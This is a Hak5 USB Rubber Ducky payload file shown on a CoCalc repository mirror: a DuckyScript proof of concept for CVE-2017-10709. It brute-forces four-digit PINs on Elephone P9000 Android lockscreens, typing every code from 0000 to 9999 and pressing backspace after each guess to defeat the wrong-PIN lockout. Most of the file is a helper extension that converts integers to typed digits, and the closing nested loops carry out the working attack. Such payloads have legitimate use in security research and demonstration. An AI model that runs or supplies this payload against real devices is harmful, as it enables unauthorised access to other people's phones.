Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4Backspace.txt
3131 views
1
ATTACKMODE HID

2
REM TITLE: Brute Force 

3
REM AUTHOR: Cribbit

4
REM DESCRIPTION: POC of CVE-2017-10709 using a Ducky. The lockscreen on Elephone P9000 devices (running Android 6.0) allows physically proximate attackers to bypass a wrong-PIN lockout feature by pressing backspace after each PIN guess.

5
REM PROPS: Kalani & Shinichi Kudo

6
DELAY 3000

7


8
EXTENSION TRANSLATE

9
    REM VERSION 1.0

10


11
    REM This extension acts as a library or collection of helper functions

12
    REM to work with converting variables in your payloads.

13
    REM WHY:

14
    REM Of the many ways to get information about the state of your payload 

15
    REM is by injecting static strings effectively as debugging prints

16
    REM However, given the non-static nature of payloads using variables in

17
    REM DuckyScript 3.0 - the ability to decode variables during payload 

18
    REM execution and print (inject) representations of their current state 

19
    REM can often be a critically helpful development and debugging tool.

20


21
    REM Available Functions:

22
    REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call

23
    REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call

24
    REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call

25
    REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call

26


27
    REM USAGE:

28
    REM set $INPUT to desired var

29
    REM call the correct translate_ function for the expected data type e.g.

30
    REM    VAR $myVar = 1234

31
    REM    $INPUT = $myVar

32
    REM    TRANSLATE_INT()

33
    REM    REM the above code will inject 1234

34


35
    REM begin extension variables

36
    DEFINE PRINT_INT 0

37
    DEFINE PRINT_HEX 1

38
    VAR $DIGIT_PRINT_MODE = PRINT_INT

39
    VAR $D = 0

40
    VAR $IN = 0

41
    VAR $INPUT = 0

42
    VAR $MOD = 0

43
    VAR $P = FALSE

44
    VAR $NL = TRUE

45
    REM end extension variables

46


47
    REM REQUIRED for INT/HEX - convert int to char

48
    FUNCTION PRINTDIGIT()

49
        IF ($D == 0) THEN

50
            STRING 0

51
        ELSE IF ($D == 1) THEN

52
            STRING 1

53
        ELSE IF ($D == 2) THEN

54
            STRING 2

55
        ELSE IF ($D == 3) THEN

56
            STRING 3

57
        ELSE IF ($D == 4) THEN

58
            STRING 4

59
        ELSE IF ($D == 5) THEN

60
            STRING 5

61
        ELSE IF ($D == 6) THEN

62
            STRING 6

63
        ELSE IF ($D == 7) THEN

64
            STRING 7

65
        ELSE IF ($D == 8) THEN

66
            STRING 8

67
        ELSE IF ($D == 9) THEN

68
            STRING 9

69
        ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN

70
            IF ($D == 10) THEN

71
                STRING A

72
            ELSE IF ($D == 11) THEN

73
                STRING B

74
            ELSE IF ($D == 12) THEN

75
                STRING C

76
            ELSE IF ($D == 13) THEN

77
                STRING D

78
            ELSE IF ($D == 14) THEN

79
                STRING E

80
            ELSE IF ($D == 15) THEN

81
                STRING F

82
            END_IF

83
        ELSE

84
            STRING ?

85
        END_IF

86
    END_FUNCTION

87


88
    REM REQUIRED for INT/HEX- consumes a character / place from the input

89
    FUNCTION CONSUME()

90
        $D = 0

91
        WHILE ($INPUT >= $MOD)

92
            $D = ($D + 1)

93
            $INPUT = ($INPUT - $MOD)

94
        END_WHILE

95
        IF (($D > 0) || ($P == TRUE)) THEN

96
            $P = TRUE

97
            PRINTDIGIT()

98
        END_IF

99
    END_FUNCTION

100


101
    REM ENDIAN SWAPPER helper, (useful for working with VID/PID)

102
    FUNCTION SWAP_ENDIAN()

103
        $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))

104
    END_FUNCTION

105


106
    REM Translates a variable of presumed integer type and attempts to convert

107
    REM and inject a DECIMAL string representation

108
    FUNCTION TRANSLATE_INT() 

109
        $DIGIT_PRINT_MODE = PRINT_INT

110
        $P = FALSE

111
        IF ( $INPUT >= 10000) THEN

112
            $MOD = 10000

113
            CONSUME()

114
        END_IF

115
        IF (($INPUT >= 1000) || ($P == TRUE)) THEN

116
            $MOD = 1000

117
            CONSUME()

118
        END_IF

119
        IF (($INPUT >= 100) || ($P == TRUE)) THEN

120
            $MOD = 100

121
            CONSUME()

122
        END_IF

123
        IF (($INPUT >= 10) || ($P == TRUE)) THEN

124
            $MOD = 10

125
            CONSUME()

126
        END_IF()

127
        $D = $INPUT

128
        PRINTDIGIT()

129
        IF $NL THEN

130
            ENTER

131
        END_IF

132
    END_FUNCTION

133


134
    REM Translates a variable of presumed boolean type and attempts to convert

135
    REM and inject a BOOLEAN string representation

136
    FUNCTION TRANSLATE_BOOL()

137
        IF $INPUT THEN

138
            STRING TRUE

139
        ELSE

140
            STRING FALSE

141
        END_IF

142
        IF $NL THEN

143
            ENTER

144
        END_IF

145
    END_FUNCTION

146


147
    REM Translates a variable of presumed integer type and attempts to convert

148
    REM and inject a HEX string representation

149
    FUNCTION TRANSLATE_HEX()

150
        $DIGIT_PRINT_MODE = PRINT_HEX

151
        VAR $chars = 0

152
        VAR $d1 = 0

153
        VAR $d2 = 0

154
        VAR $d3 = 0

155
        VAR $d4 = 0

156
        WHILE ($INPUT > 0)

157
            IF ($chars == 0) THEN

158
                $d1 = ($INPUT % 16)

159
            ELSE IF ($chars == 1) THEN

160
                $d2 = ($INPUT % 16)

161
            ELSE IF ($chars == 2) THEN

162
                $d3 = ($INPUT % 16)

163
            ELSE IF ($chars == 3) THEN

164
                $d4 = ($INPUT % 16)

165
            END_IF

166
            $chars = ($chars + 1)

167
            $INPUT = ($INPUT / 16)

168
        END_WHILE

169
        VAR $i = 0

170
        STRING 0x

171
        IF ($chars == 0) THEN

172
            STRING 0x0000

173
        ELSE IF ($chars == 1) THEN

174
            STRING 000

175
            $D = $d1

176
            PRINTDIGIT()

177
        ELSE IF ($chars == 2) THEN

178
            STRING 00

179
            $D = $d2

180
            PRINTDIGIT()

181
            $D = $d1

182
            PRINTDIGIT()

183
        ELSE IF ($chars == 3) THEN

184
            STRING 0

185
            $D = $d3

186
            PRINTDIGIT()

187
            $D = $d2

188
            PRINTDIGIT()

189
            $D = $d1

190
            PRINTDIGIT()

191
        ELSE IF ($chars == 4) THEN

192
            STRING 0

193
            $D = $d4

194
            PRINTDIGIT()

195
            $D = $d3

196
            PRINTDIGIT()

197
            $D = $d2

198
            PRINTDIGIT()

199
            $D = $d1

200
            PRINTDIGIT()

201
        END_IF

202
        IF $NL THEN

203
            ENTER

204
        END_IF

205
    END_FUNCTION

206


207
    REM Translates a variable of presumed integer type and attempts to convert

208
    REM and inject a BINARY string representation

209
    FUNCTION TRANSLATE_BINARY()

210
        VAR $I = 16

211
        WHILE ( $I > 0 )

212
            $I = ($I - 1)

213
            IF (($INPUT & 0x8000) == 0 ) THEN

214
                STRING 0

215
            ELSE

216
                STRING 1

217
            END_IF

218
            $INPUT = ($INPUT << 1)

219
        END_WHILE

220
        IF $NL THEN

221
            ENTER

222
        END_IF

223
    END_FUNCTION

224
END_EXTENSION

225
REM Turn off TRANSLATE newline

226
$NL = FALSE

227
VAR $Frist = 0

228
VAR $Second = 0

229
VAR $Third = 0

230
VAR $Forth = 0

231


232
WHILE ($Frist < 10)

233
    $INPUT = $Frist

234
    TRANSLATE_INT()

235
    $Second = 0

236
    WHILE ($Second < 10)

237
        $INPUT = $Second

238
        TRANSLATE_INT()

239
        $Third = 0

240
        WHILE ($Third < 10)

241
            $INPUT = $Third

242
            TRANSLATE_INT()

243
            $Forth = 0

244
            WHILE ($Forth < 10)

245
                $INPUT = $Forth

246
                TRANSLATE_INT()

247
                $Forth = ($Forth + 1)

248
                DELAY 1000

249
                BACKSPACE

250
            END_WHILE

251
            $Third = ($Third + 1)

252
            BACKSPACE

253
        END_WHILE

254
        $Second = ($Second + 1)

255
        BACKSPACE

256
    END_WHILE

257
    $Frist = ($Frist + 1)

258
    BACKSPACE

259
END_WHILE

260


261